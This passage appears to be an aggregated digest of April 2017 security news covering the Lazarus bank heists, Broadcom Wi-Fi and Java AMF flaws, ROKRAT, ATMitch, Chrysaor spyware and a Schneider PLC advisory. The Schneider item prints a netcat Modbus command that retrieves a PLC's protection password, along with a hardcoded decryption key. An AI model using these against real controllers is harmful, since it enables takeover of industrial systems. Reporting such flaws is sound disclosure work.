“Conscious about user Cyber Security concerns, Schneider Electric places a high priority on the evaluation of security research as it becomes available and produces documentation to advise users on mitigations that can be taken if they are required. Because of an issue in our standard process for interactions with cybersecurity advisory & consulting firms, we have missed the opportunity to respond to the researchers from OpenSource Security (Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg) and offer mitigation to users, and we do apologize for this. We’re reviewing and updating our processes to make sure such a situation never happens again,” the company added.

Schneider Electric recently notified customers about the availability of patches and mitigations for three vulnerabilities affecting some of its Modicon PLCs.


Lazarus Under The Hood
5.4.2017 Kaspersky CyberCrime
Download full report (PDF)

In February 2017 an article in the Polish media broke the silence on a long-running story about attacks on banks, allegedly related to the notoriously known Lazarus Group. While the original article didn’t mention Lazarus Group it was quickly picked up by security researchers. Today we’d like to share some of our findings, and add something new to what’s currently common knowledge about Lazarus Group activities, and their connection to the much talked about February 2016 incident, when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank.

Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist. One such publication was made available by BAE systems in May 2016, however it only included analysis of the wiper code. This was followed by another blogpost by Anomali Labs, confirming the same wiping code similarity. This similarity was found to be satisfying to many readers, however at Kaspersky Lab, we were looking for a stronger connection.

Other claims that Lazarus was the group behind attacks on the Polish financial sector, came from Symantec in 2017, which noticed string reuse in malware at one of their Polish customers. Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers. However, from this it’s only clear that Lazarus might have attacked Polish banks.

While all these facts are fascinating, the connection between Lazarus attacks on banks, and their role in attacks on banks’ systems, was still loose. The only case where specific malware targeting the bank’s infrastructure used to connect to SWIFT messaging server was discovered, is the Bangladesh Central Bank case. However, while almost everybody in the security industry has heard about the attack, few technical details have been revealed to the public based on the investigation that took place on site at the attacked company. Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers, it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions, or if Lazarus had in fact developed its own malware to attack banks’ systems.

We would like to add some strong facts that link some attacks on banks to Lazarus, and share some of our own findings as well as shed some light on the recent TTPs used by the attacker, including some yet unpublished details from the attack in Europe in 2017.

This is the first time we announce some Lazarus Group operations that have thus far gone unreported to the public. We have had the privilege of investigating these attacks and helping with incident response at a number of financial institutions in South East Asia and Europe. With cooperation and support from our research partners, we have managed to address many important questions about the mystery of Lazarus attacks, such as their infiltration method, their relation to attacks on SWIFT software and, most importantly, shed some light on attribution.

Lazarus Under The Hood (Blogpost)

Lazarus attacks are not a local problem and clearly the group’s operations span across the whole world. We have seen the detection of their infiltration tools in multiple countries in the past year. Lazarus was previously known to conduct cyberespionage and cybersabotage activities, such as attacks on Sony Pictures Entertainment with volumes of internal data leaked, and many system harddrives in the company wiped. Their interest in financial gain is relatively new, considering the age of the group, and it seems that they have a different set of people working on the problems of invisible money theft or the generation of illegal profit. We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations, while a substantially smaller units within the group, which we have dubbed Bluenoroff, is responsible for financial profit.

The watering hole attack on Polish banks was very well covered by media, however not everyone knows that it was one of many. Lazarus managed to inject malicious code in many other locations. We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia. Lazarus/Bluenoroff regrouped and rushed into new countries, selecting mostly poorer and less developed locations, hitting smaller banks because they are, apparently, easy prey.

To date, we’ve seen Bluenoroff attack four main types of targets:

Financial institutions
Casinos
Companies involved in the development of financial trade software
Crypto-currency businesses
Here is the full list of countries where we have seen Bluenoroff watering hole attacks:

Mexico
Australia
Uruguay
Russian Federation
Norway
India
Nigeria
Peru
Poland
Of course, not all attacks were as successful as the Polish attack case, mainly because in Poland they managed to compromise a government website. This website was frequently accessed by many financial institutions making it a very powerful attack vector. Nevertheless, this wave of attacks resulted in multiple infections across the world, adding new hits to the map we’ve been building.

One of the most interesting discoveries about Lazarus/Bluenoroff came from one of our research partners who completed a forensic analysis of a C2 server in Europe used by the group. Based on the forensic analysis report, the attacker connected to the server via Terminal Services and manually installed an Apache Tomcat server using a local browser, configured it with Java Server Pages and uploaded the JSP script for C2. Once the server was ready, the attacker started testing it. First with a browser, then by running test instances of their backdoor. The operator used multiple IPs: from France to Korea, connecting via proxies and VPN servers. However, one short connection was made from a very unusual IP range, which originates in North Korea.

Lazarus Under The Hood (Blogpost)

In addition, the operator installed an off-the-shelf cryptocurrency mining software that should generate Monero cryptocoins. The software so intensely consumed system resources that the system became unresponsive and froze. This could be the reason why it was not properly cleaned, and the server logs were preserved.

This is the first time we have seen a direct link between Bluenoroff and North Korea. Their activity spans from backdoors to watering hole attacks, and attacks on SWIFT servers in banks of South East Asia and Bangladesh Central Bank. Now, is it North Korea behind all the Bluenoroff attacks after all? As researchers, we prefer to provide facts rather than speculations. Still, seeing IP in the C2 log, does make North Korea a key part of the Lazarus Bluenoroff equation.

Conclusions

Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011 and activities didn’t disappear after Novetta published the results of its Operation Blockbuster research, in which we also participated. All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.

We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers. Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.

Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto. Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.

This level of sophistication is something that is not generally found in the cybercriminal world. It’s something that requires strict organisation and control at all stages of operation. That’s why we think that Lazarus is not just another APT actor.

Of course such processes require a lot of money to keep running, which is why the appearance of the Bluenoroff subgroup within Lazarus was logical.

Bluenoroff, being a subgroup of Lazarus, is focusing on financial attacks only. This subgroup has reverse engineering skills because they spend time tearing apart legitimate software, and implementing patches for SWIFT Alliance software, in attempts to find ways to steal big money. Their malware is different and they aren’t exactly soldiers that hit and run. Instead, they prefer to make an execution trace to reconstruct and quickly debug the problem. They are field engineers that come when the ground is already cleared after conquering new lands.

One of Bluenoroff’s favorite strategies is to silently integrate into running processes without breaking them. From the code we’ve seen, it looks as if they are not exactly looking for a hit and run solution when it comes to money theft. Their solutions are aimed at invisible theft without leaving a trace. Of course, attempts to move around millions of USD can hardly remain unnoticed, but we believe that their malware might be secretly deployed now in many other places and it isn’t triggering any serious alarms because it’s much more quiet.

We would like to note, that in all of the observed attacks against banks that we have analyzed, SWIFT software solutions running on banks’ servers haven’t demonstrated or exposed any specific vulnerability. The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database. Therefore, in all the breaches we have analyzed, SWIFT, as an organization has not been at direct fault. More than that, we have witnessed SWIFT trying to protect its customers by implementing the detection of database and software integrity issues. We believe that this is a step in the right direction and these activities should be extended with full support. Complicating the patches of integrity checks further may create a serious threat to the success of future operations run by Lazarus/Bluenoroff against banks worldwide.

To date, the Lazarus/Bluenoroff group has been one of the most successful in launching large scale operations against the financial industry. We believe that they will remain one of the biggest threats to the banking sector, finance and trading companies, as well as casinos for the next few years. We would like to note that none of the financial institutions we helped with incident response and investigation reported any financial loss.

As usual, defense against attacks such as those from Lazarus/Bluenoroff should include a multi-layered approach. Kaspersky products include special mitigation strategies against this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lazarus/Bluenoroff actor and share new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.


Flaws in Java AMF Libraries Allow Remote Code Execution

5.4.2017 secureweek Vulnerebility 

Deserialization-related vulnerabilities found in several Java implementations of AMF3 can be exploited for unauthenticated remote code execution and XXE attacks, warned CERT/CC.

The security holes were reported to CERT/CC and vendors by Markus Wulftange, senior penetration tester at Code White. Patches have been made available for some of the affected products.

Serialization is the process where an object is converted to a stream of bytes in order to store or transmit that object to memory or a file. The process in which serialized data is extracted is called deserialization and it can lead to significant security flaws if not handled properly.

AMF3, the latest version of Adobe’s Action Message Format, is a compact binary format used to serialize ActionScript object graphs. AMF was first introduced in Flash Player 6 in 2001 and AMF3 has been around since Flash Player 9.

There have been several reports in the past few years about remote code execution vulnerabilities introduced in Java-based applications due to inadequate serialization implementations.

Wulftange has discovered that some Java implementations of AMF3 deserializers introduce potentially serious vulnerabilities, allowing unauthenticated attackers to remotely execute code or cause a denial-of-service (DoS) condition. An XXE flaw reported by the researcher can also lead to disclosure of sensitive data on the server.

CERT/CC’s advisory mentions three vulnerabilities. The first flaw allows an attacker who can spoof or control an RMI (Remote Method Invocation) server to execute code. This security hole is said to affect Atlassian’s JIRA, Exadel’s Flamingo, GraniteDS, Spring spring-flex, and WebORB for Java by Midnight Coders.

The second vulnerability can also be exploited for arbitrary code execution by an attacker who can spoof or control information. This weakness impacts Flamingo, Apache’s Flex BlazeDS and GraniteDS. The XXE flaw has been found to affect the same products along with WebORB.

Some of the vulnerable libraries, such as GraniteDS and Flamingo, have been discontinued. Atlassian and Apache have released patches for the flaws impacting their products.

According to CERT/CC, products from HPE, SonicWall and VMware could also be affected. The organization has advised developers to use versions of JDK that implement serialization blacklisting filters and ensure that their products properly handle deserialized data from untrusted sources.


Still problems for Schneider Electric, Schneider Modicon TM221CE16R has a hardcoded password
5.4.2017 securityaffairs Security

The firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password, and there is no way to change it.
I believe it is very disconcerting to find systems inside critical infrastructure affected by easy-to-exploit vulnerabilities while we are discussing the EU NIS directive.

What about hard-coded passwords inside critical systems?

Unfortunately, it’s happened again, the firmware running on the Schneider Modicon TM221CE16R (Firmware 1.3.3.3) has a hardcoded password. The bad news for users is that they a cannot change the password and there is no firmware update available to fix this issue.

The firmware encrypted the XML file containing user and password with the fixed key “SoMachineBasicSoMachineBasicSoMa”.

It is quite easy for an attacker to open the control environment (SoMachine Basic 1.4 SP1), decrypt the file, and take control over the device.

“The password for the project protection of the Schneider Modicon TM221CE16R is hard-coded and cannot be changed.” reads the security advisory published by Simon Heming, Maik Brüggemann, Hendrik Schwartke, Ralf Spenneberg of Germany’s Open Source Security.”The protection of the application is not existent.”

Schneider Modicon TM221CE16R

The same team of researchers discovered another security issue affecting the Schneider TM221CE16R Firmware 1.3.3.3 hardware. The experts discovered that the password used to protect the applications can be easily retrieved by a remote unauthenticated user. The Application Protection is used to prevent the transfer of the application from a logic controller into a SoMachine Basic project.

“The password for the application protection of the Schneider Modicon TM221CE16R can be retrieved without authentication. Subsequently the application may be arbitrarily downloaded, uploaded and modified. CVSS 10.” reads a separate security advisory published by the team.

The experts discovered that a user just needs to send the following command over Modbus using TCP Port 502:

echo -n -e '\x00\x01\x00\x00\x00\x05\x01\x5a\x00\x03\x00' | nc IP 502
“After that the retrieved password can be entered in SoMachine Basic to download, modify and subsequently upload again any desired application”, continues the advisory.


Download and install the last iOS 10.3.1, attackers can hack you over Wi-Fi
5.4.2017 securityaffairs Apple

A critical flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip,” download and install last iOS 10.3.1 version.
Last week, Apple released iOS 10.3, an important release of the popular operating system the fixed more than 100 bugs and implements security improvements.

Apple opted to push an emergency patch update (iOS 10.3.1 version), that fixed some critical vulnerabilities, including one tracked as CVE-2017-6975. The flaw could be exploited by attackers within range to “execute arbitrary code on the Wi-Fi chip.”
The flaw was first discovered by the expert Gal Beniamini from the Google’s Project Zero team, the expert and his team did not disclose technical details on the flaw.

“Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip

Description: A stack buffer overflow was addressed through improved input validation.

ios 10.3.1 release

CVE-2017-6975: Gal Beniamini of Google Project Zero” reads the security note published by Apple for the iOS 10.3.1 release.

The CVE-2017-6975 affects iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later
iPhone 5S was not affected because it is the first model based on a 64-bit processor.

Today Beniamini will publish a detailed technical analysis of the issue, including a detailed description of the attack scenario.The iOS 10.3.1 update can be downloaded via Settings → General → Software Update on your iOS device.
Apple users already running the iOS 10.3 can download and install the iOS 10.3.1 release simply pressing on the “Download and Install” button to install the update.

If you are the owner of an Apple iPhone, iPad and iPod Touch you must update your device as soon as possible.


Millions Of Smartphones Using Broadcom Wi-Fi Chip Can Be Hacked Over-the-Air
5.4.2017 thehackernews Mobil


Millions of smartphones and smart gadgets, including Apple iOS and many Android handsets from various manufacturers, equipped with Broadcom Wifi chips are vulnerable to over-the-air hijacking without any user interaction.
Just yesterday, Apple rushed out an emergency iOS 10.3.1 patch update to address a serious bug that could allow an attacker within same Wifi network to remotely execute malicious code on the Broadcom WiFi SoC (Software-on-Chip) used in iPhones, iPads, and iPods.
The vulnerability was described as the stack buffer overflow issue and was discovered by Google's Project Zero staffer Gal Beniamini, who today detailed his research on a lengthy blog post, saying the flaw affects not only Apple but all those devices using Broadcom's Wi-Fi stack.
Beniamini says this stack buffer overflow issue in the Broadcom firmware code could lead to remote code execution vulnerability, allowing an attacker in the smartphone's WiFi range to send and execute code on the device.
Attackers with high skills can also deploy malicious code to take full control over the victim's device and install malicious apps, like banking Trojans, ransomware, and adware, without the victim's knowledge.
In his next blog post that's already on its way, Beniamini will explain how attackers can use their assumed control of the Wi-Fi SoC in order to further escalate their privileges into the application processor, taking over the host’s operating system.
Over-the-Air Broadcom Wi-Fi SoC Hack

According to the researcher, the firmware running on Broadcom WiFi SoC can be tricked into overrunning its stack buffers, which allowed him to send carefully crafted WiFi frames, with abnormal values, to the Wi-Fi controller in order to overflow the firmware's stack.
Beniamini then combined this value with the frequent timer firings of the chipset to gradually overwrite specific chunks of device's memory (RAM) until his malicious code is executed.
So, to exploit the flaw, an attacker needs to be within the WiFi range of the affected device to silently take over it.
"While the firmware implementation on the Wi-Fi SoC is incredibly complex, it still lags behind in terms of security," Beniamini explains. "Specifically, it lacks all basic exploit mitigations – including stack cookies, safe unlinking and access permission protection."
The researcher also detailed a proof-of-concept Wi-Fi remote code execution exploit in the blog post and successfully performed it on a then-fully updated (now fixed) Nexus 6P, running Android 7.1.1 version NUF26K – the latest available Nexus device at the time of testing in February.
The flaw is one of the several vulnerabilities discovered by Beniamini in the firmware version 6.37.34.40 of Broadcom Wi-Fi chips.
Security Patch for Nexus & iOS Released; Others Have to Wait!
Google Project Zero team reported the issue to Broadcom in December. Since the flaw is in Broadcom's code, smartphone makers had to wait for a patch from the chip vendor before testing the patch and pushing it out to their own user base.
Both Apple and Google addressed the vulnerability with security updates released on Monday, with Google delivering updates via its Android April 2017 Security Bulletin and Apple releasing the iOS 10.3.1 update.
The flaw still affects most Samsung flagship devices, including Galaxy S7 (G930F, G930V), Galaxy S7 Edge (G935F, G9350), Galaxy S6 Edge (G925V), Galaxy S5 (G900F), and Galaxy Note 4 (N910F), the researcher says.
For more technical details head on to the blog post published by Google Project Zero team today.


Wi-Fi Flaws Expose iPhone, Nexus Phones to Attacks

5.4.2017 securityweek  Vulnerebility

Vulnerabilities in Broadcom’s Wi-Fi system-on-chip (SoC) can be exploited to hijack iPhone, Nexus, Samsung and other smartphones without requiring any user interaction.

Google Project Zero researcher Gal Beniamini has identified several remote code execution, privilege escalation and information disclosure vulnerabilities in Broadcom firmware.

Since Broadcom’s Wi-Fi chips are widely used, the flaws affect many devices, including Google’s Nexus 5, 6 and 6P, all iPhones since iPhone 4, and most of Samsung’s flagship Android smartphones.

Beniamini has published a lengthy blog post describing the Broadcom Wi-Fi chipset and vulnerabilities that can be exploited for remote code execution. The researcher has also promised to publish another blog post that will provide details on the second part of the exploit chain, which involves elevating privileges from the SoC to the operating system’s kernel.

An attacker who is in Wi-Fi range can exploit the security holes found by the Google researcher to take complete control of a vulnerable device without any user interaction.

Beniamini applauded Broadcom’s response, stating that the company was responsive and helpful in fixing the vulnerabilities and making the patches available to affected device manufacturers.

The researcher said Broadcom’s firmware lacks all basic exploit mitigations, but the company claims newer versions do include some security mechanisms and exploit mitigations are being considered for future versions.

Apple released an emergency update this week for iOS to address the remote code execution vulnerability (CVE-2017-6975), but the company did not provide any details.

The Broadcom flaws were also patched in Android with the release of the April security updates.

Samsung has also released maintenance updates this week for its Android devices. The updates include both the Google patches and fixes for vulnerabilities specific to Samsung products.


South Korean users targeted with a new stealthy malware, the ROKRAT RAT
5.4.2017 securityaffairs Virus

Security experts at CISCO Talos have spotted a new insidious remote access tool dubbed ROKRAT that implements sophisticated anti-detection measures.
The ROKRAT RAT targets Korean users, people using the popular Korean Microsoft Word alternative Hangul Word Processor (HWP). In the past, we saw other attacks against people using the HWP application.

ROKRAT RAT

The ROKRAT RAT was used in a phishing campaign detected several weeks, attackers leveraged on weaponized documents as attachments.

“This actor is quick to cover their tracks and very quickly cleaned up their compromised hosts. We believe the compromised infrastructure was live for a mere matter of hours during any campaign,” reads the analysis published by Cisco Talos researchers Warren Mercer, Paul Rascagneres and Matthew Molyett.

The experts speculate the involvement of a sophisticated threat actor that aimed to compromise systems of South Korean users in the public sector.

The attackers sent phishing messages from an email address tied to South Korea’s Yonsei University on the topic of an upcoming and fictitious “Korean Reunification and North Korean Conference”.

The attackers compromised a legitimate email address of a big forum powered by a university in Seoul to send out spear phishing email.

The attackers attempted to trick victims into open the attachments to provide feedback to conference organizers. Phishing emails contain two HWP documents that embed Encapsulated PostScript (EPS) object.

“The purpose of the EPS is to exploit a well-known vulnerability (CVE-2013-0808) to download a binary disguised as a .jpg file. This file is decoded and finally an executable is launched: ROKRAT,” said researchers.

The EPS flaw, tracked as CVE-2013-0808, was discovered in 2013, it is an EPS viewer buffer overflow vulnerability, that could be exploited by attackers to execute arbitrary code on targeted machines.

“An HWP document is composed by OLE objects. In our case, it contains an EPS object named BIN0001.eps. As with all HWP documents the information is zlib compressed so you must decompress the .eps to get the true shellcode.” continues the analysis.

The shellcode is used to trigger the CVE-2013-0808 vulnerability and download the ROKRAT RAT binary from the command and control server. The binary is dropped as a .jpg file named “worker.jpg” or “kingstone.jpg”.

If the malware detects a sandbox environment it will block its activity and try to deceive security researchers by generating fake traffic.

The malware appears to connect and load either an Amazon video of a game called “Men of War” or a Hulu anime video called “Golden Time”.

The security experts warned of similar attacks against other high-value targets, it is possible that threat actors can exploit the EPS vulnerability to target also Microsoft Word users.

The experts also noticed observed an evolution of the ROKRAT RAT, it is using new communication channels, such as Twitter and Yandex and Mediafire cloud platforms.

In this way, the attacker can make hard the detection of the malicious traffic and leverages also the use of HTTPS connectivity implemented by these services.

“This investigation shows us once again that South Korean interests sophisticated threat actors.” concludes the analysis.

“This campaign shows us a motivated malware actor. The usage of HWP (an application mainly used in Korea) and the fact that emails and documents are perfectly written in Korean suggests that the author is a native Korean speaker.”


Ransomware in targeted attacks
5.4.2017 Kaspersky Virus

Ransomware’s popularity has attracted the attention of cybercriminal gangs; they use these malicious programs in targeted attacks on large organizations in order to steal money. In late 2016, we detected an increase in the number of attacks, the main goal of which was to launch an encryptor on an organization’s network nodes and servers. This is due to the fact that organizing such attacks is simple, while their profitability is high:

The cost of developing a ransom program is significantly lower compared to other types of malicious software.
These programs entail a clear monetization model.
There is a wide range of potential victims.
Today, an attacker (or a group) can easily create their own encryptor without making any special effort. A vivid example is the Mamba encryptor based on DiskCryptor, an open source software. Some cybercriminal groups do not even take the trouble of involving programmers; instead, they use this legal utility “out of the box.”

DiskСryptor utility

The model of attack looks like this:

Search for an organization that has an unprotected server with RDP access.
Guess the password (or buy access on the black market).
Encrypt a node or server manually.

Notification about encrypting the organization’s server

The cost to organize such an attack is minimal, while the profit could reach thousands of dollars. Some partners of well-known encryptors resort to the same scheme. The only difference is the fact that, in order to encrypt the files, they use a version of a ransom program purchased from the group’s developer.

However, true professionals are also active on the playing field. They carefully select targets (major companies with a large number of network nodes), and organize attacks that can last weeks and go through several stages:

Searching for a victim
Studying the possibility of penetration
Penetrating the organization’s network by using exploits for popular software or Trojans on the infected network nodes
Gaining a foothold on the network and researching its topology
Acquiring the necessary rights to install the encryptor on all the organization’s nodes/servers
Installing the encryptor
Recently, we have written about one of these types of ransomware, PetrWrap, on our blog.

The screen of a machine infected with PetrWrap

Of special note is the software arsenal of a few groups that is used to penetrate and anchor in an organization’s network. For example, one of the groups used open source exploits for the server software that was being used on the server of the victim organization. Once the attackers had exploited this vulnerability, they installed an open sourced RAT tool, called PUPY, on the system.

Pupy RAT description

Once they had gained a foothold in the victim network, the attackers used a Mimikatz tool to acquire the necessary access rights, and then installed the encryptor on the network using PsExec.

Considering the above, we can conclude that the scenario of ransomware infection in a target attack differs significantly from the usual infection scenario (malicious email attachments, drive-by-attacks, etc.). To ensure comprehensive security of an organization’s network, it is necessary to audit the software installed on all nodes and servers of the network. If any outdated software is discovered, then it should be updated immediately. Additionally, network administrators should ensure all types of remote access are reliably protected.

Of special note is the fact that, in most cases, the targets of attacks are the servers of an organization, which means that they should be safeguarded by security measures. In addition, the constant process of creating backup copies must be imperative; this will help bring the company’s IT infrastructure back to operational mode quickly and with minimal financial loss.


ATMitch: remote administration of ATMs
5.4.2017 Kaspersky Virus

In February 2017, we published research on fileless attacks against enterprise networks. We described the data collected during incident response in several financial institutions around the world, exploring how attackers moved through enterprise networks leaving no traces on the hard drives. The goal of these attackers was money, and the best way to cash out and leave no record of transactions is through the remote administration of ATMs. This second paper is about the methods and techniques that were used by the attackers in the second stage of their attacks against financial organizations – basically enabling remote administration of ATMs.

In June 2016, Kaspersky Lab received a report from a Russian bank that had been the victim of a targeted attack. During the heist, the criminals were able to gain control of the ATMs and upload malware to them. After cashing out, the malware was removed. The bank’s forensics specialists were unable to recover the malicious executables because of the fragmentation of a hard drive after the attack, but they were able to restore the malware’s logs and some file names.

The bank’s forensic team were able, after careful forensic analysis of the ATM’s hard drive, to recover the following files containing logs:

C:\Windows\Temp\kl.txt
C:\logfile.txt
In addition, they were able to find the names of two deleted executables. Unfortunately, they were not able to recover any of the contents:

C:\ATM\!A.EXE
C:\ATM\IJ.EXE
Within the log files, the following pieces of plain text were found:

[Date – Time]
[%d %m %Y – %H : %M : %S] > Entering process dispense.
[%d %m %Y – %H : %M : %S] > Items from parameters converted successfully. 4 40
[%d %m %Y – %H : %M : %S] > Unlocking dispenser, result is 0
[%d %m %Y – %H : %M : %S] > Catch some money, bitch! 4000000
[%d %m %Y – %H : %M : %S] > Dispense success, code is 0

As mentioned in the previous paper, based on the information from the log file we created a YARA rule to find a sample, in this case: MD5 cef6c2aa78ff69d894903e41a3308452. And we’ve found one. This sample was uploaded twice (from Kazakhstan and Russia) as “tv.dll”.

ATMitch: remote administration of ATMs

The malware, which we have dubbed ATMitch, is fairly straightforward. Once remotely installed and executed via Remote Desktop Connection (RDP) access to the ATM from within the bank, the malware looks for the “command.txt” file that should be located in the same directory as the malware and created by the attacker. If found, the malware reads the one character content from the file and executes the respective command:

‘O’ – Open dispenser
‘D’ – Dispense
‘I’ – Init XFS
‘U’ – Unlock XFS
‘S’ – Setup
‘E’ – Exit
‘G’ – Get Dispenser id
‘L’ – Set Dispenser id
‘C’ – Cancel
After execution, ATMitch writes the results of this command to the log file and removes “command.txt” from the ATM’s hard drive.

The sample “tv.dll” successfully retrieved in this case does not try to conceal itself within the system.

ATMitch: remote administration of ATMs

The malware’s command parser

The malware uses the standard XFS library to control the ATM. It should be noted that it works on every ATM that supports the XFS library (which is the vast majority).

Unfortunately, we were unable to retrieve the executables (!A.exe and IJ.exe, located in C:\ATM) from the ATM; only the file names were found as artefacts during the forensic analysis. We assume that these are the installer and uninstaller of the malware. It should also be noted that “tv.dll” contained one Russian-language resource.

Kaspersky Lab continues to monitor and track these kinds of threats and reiterates the need for whitelisting in ATMs as well as the use of anti-APT solutions in banking networks.


Android Chrysaor spyware went undetected for years
5.4.2017 securityaffairs Android

Chrysaor spyware is an Android surveillance malware that remained undetected for at least three years, NSO Group Technology is suspected to be the author.
Security experts at Google and Lookout spotted an Android version of one of the most sophisticated mobile spyware known as Chrysaor that remained undetected for at least three years. due to its smart self-destruction capabilities.The experts, in fact, were not able to analyse the threat due to its smart self-destruction capabilities. The Chrysaor spyware has been found installed on fewer than three-dozen Android devices.
Chrysaor was used in targeted attacks against journalists and activists, mostly located in Israel, other victims were in Georgia, Turkey, Mexico, the UAE and other countries. Experts believe the Chrysaor espionage Android malware was developed by the Israeli surveillance firm NSO Group Technologies.
Experts believe the Chrysaor espionage Android malware was developed by the Israeli surveillance firm NSO Group Technologies, we met this company when researchers spotted its Pegasus iOS spyware in the wild.
The Chrysaor Android spyware implements several features including:
Exfiltrating data from popular apps including Gmail, WhatsApp, Skype, Facebook, Twitter, Viber, and Kakao.
Controlling device remotely from SMS-based commands.
Recording Live audio and video.
Keylogging and Screenshot capture.
Disabling of system updates to prevent vulnerability patching.
Spying on contacts, text messages, emails and browser history.
Self-destruct to evade detection
chrysaor spyware
The surveillance firm NSO Group Technologies produce the best surveillance technology to governments, law enforcement agencies worldwide, but privacy advocates and activists accuse the firm of selling its malware also to dictatorial regimes.

“Although the applications were never available in Google Play, we immediately identified the scope of the problem by using Verify Apps,” reads a blog post published by Google.

“We’ve contacted the potentially affected users, disabled the applications on affected devices, and implemented changes in Verify Apps to protect all users.”

The threat was hard to analyse because it has the ability to delete itself when detect any suspicious activity that could be related to its detection.
“Pegasus for Android will remove itself from the phone if:

The SIM MCC ID is invalid
An “antidote” file exists
It has not been able to check in with the servers after 60 days
It receives a command from the server to remove itself
rchers believe that Chrysaor APK has also been distributed via SMS-based phishing messages, just like Pegasus infection on iOS devices.” reads the analysis published by Lookout.
Chrysaor exploits a well-known Android-rooting exploit called Framaroot to root the device and gain full control over the mobile device.

The experts noticed that the Chrysaor spyware back to 2014, this means that it is possible that NSO group might have discovered zero-day vulnerabilities in Android OS and has implemented the exploit code in the latest version of Chrysaor spyware.

Lookout published a detailed analysis of the Chrysaor spyware titled “Pegasus for Android: Technical Analysis and Findings of Chrysaor.”


Update Your Apple Devices to iOS 10.3.1 to Avoid Being Hacked Over Wi-Fi
5.4.2017 thehackernews Apple
Less than a week after Apple released iOS 10.3 with over 100 bug fixes and security enhancements; the company has just pushed an emergency patch update – iOS 10.3.1 – to addresses a few critical vulnerabilities, one of which could allow hackers to "execute arbitrary code on the Wi-Fi chip."
The vulnerability, identified as CVE-2017-6975, was discovered by Google's Project Zero staffer Gal Beniamini, who noted on Twitter that more information about the flaw would be provided tomorrow.
Apple also did not provide any technical details on the flaw, but urged Apple iPhone, iPad and iPod Touch users to update their devices as soon a possible.
In the security note accompanying iOS 10.3.1, Apple describes the issue as a stack buffer overflow vulnerability, which the company addressed by improving the input validation.
A stack buffer overflow flaw occurs when the execution stack grows beyond the memory that is reserved for it, allowing hackers to execute malicious code remotely.
The flaw allows an attacker, within range, to execute malicious code on the phone's Wi-Fi chip.
The vulnerability appears to affect iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation, and later devices running the iOS 10.3 operating system.
It's worth mentioning that iPhone 5 and iPhone 5C were Apple's last iPhone handsets to have a 32-bit processor with Apple A6 system on a chip. Since iPhone 5S has a 64-bit processor, it is not affected by the issue.
To know more technical details about the flaw, you are required to wait until tomorrow when Beniamini will release a detailed blog post describing the bug and its impact on Apple users.
With iOS 10.3 release, an over-the-air download for 32-bit Apple devices wasn't available. This has also being changed with iOS 10.3.1 update, which brings back support for iPhone 5 and 5C as well as the fourth-generation iPad -- the only remaining 32-bit Apple devices.
The iOS 10.3.1 update can be downloaded over-the-air via Settings → General → Software Update on your iOS device.
Apple users running iOS 10.3 should be able to see the iOS 10.3.1 update, so press on the "Download and Install" button to install the update.


Ecuador's New President Warns Assange Not to 'Meddle'

4.4.2017 securityweek BigBrothers
Ecuador's President-elect Lenin Moreno warned Julian Assange on Tuesday not to meddle in the country's politics, after the WikiLeaks founder taunted a rival candidate following his loss.

Moreno's election victory Sunday was a relief for Assange, who has been holed up in Ecuador's London embassy since 2012 to avoid arrest.

The socialist president-elect's conservative rival, Guillermo Lasso, had vowed to kick Assange out of the embassy.

But Moreno had some stern words after Assange took to Twitter to celebrate Lasso's loss.

"Mr Julian Assange must respect the condition (of asylum) he is in and not meddle in Ecuadoran politics," he said at a news conference.

As results showed Lasso losing on election night, Assange had exuberantly turned around the right-wing candidate's threat to expel him within 30 days.

"I cordially invite Lasso to leave Ecuador within 30 days (with or without his tax haven millions)," he tweeted -- a reference to allegations the ex-banker has money stashed in offshore accounts.

Assange fled to the embassy to avoid arrest and extradition to Sweden, where he faces a rape allegation.

The 45-year-old Australian, who denies the allegation, says he fears Sweden would send him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents in 2010.

Outgoing President Rafael Correa, a fiery critic of the US, granted Assange asylum, and Moreno has vowed to uphold it.

Assange's case has returned to the spotlight since WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and her Democratic party.

That created an awkward situation for the Ecuadoran government, which responded by temporarily restricting his internet access.


